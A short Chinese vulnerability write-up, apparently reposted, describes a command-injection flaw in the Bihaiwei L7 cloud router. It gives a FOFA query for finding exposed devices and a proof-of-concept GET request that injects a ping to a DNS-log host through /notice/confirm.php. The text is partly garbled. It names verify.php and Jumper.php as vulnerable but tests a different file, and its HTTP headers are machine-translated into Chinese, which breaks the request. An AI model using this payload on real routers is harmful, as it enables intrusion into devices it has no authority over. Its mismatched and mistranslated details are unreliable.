0x01 产品简介
碧海威L7网络设备是北京智慧云科技有限公司的产品。基于国产ARM硬件平台,采用软硬件一体化协同设计方案,最大限度地提高产品性能。高扩展性、强大的产品性能、10G吞吐能力支持高性能,包括数万用户同时在线。具有简洁明了的可视化WEB管理界面,支持最新的HTML5,方便移动设备访问管理,具有易于使用和维护的分层多级管理模块,提供设备状态信息和网络流量。通过一目了然的可见性和一键备份/恢复,网络管理变得更加高效。专为酒店、度假村、商场、火车站等商业无线管理者定制的专用网络设备,具有路由、防火墙、流量控制、无线AC控制器、微信认证等多种功能。
0x02 漏洞概述
碧海威L7的verify.php和Jumper.php接口存在RCE漏洞,恶意攻击者可利用该漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器崩溃。
0x03 影响范围
碧海威科技-L7
0x04 复现环境
FOFA:app=\’碧海微科技-L7云路由\’
0x05 漏洞复现
概念验证-1
GET /notice/confirm.php?t=;ping%20fwvjytharz.dgrh3.cn HTTP/1.1
Host:你的IP
Accept: 应用程序/json,文本/javascript,*/*
用户代理: Mozilla/5.0 (Windows NT)
#碧海威L7云路由器以上查看无线运行版本相关内容来自网络。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92550.html
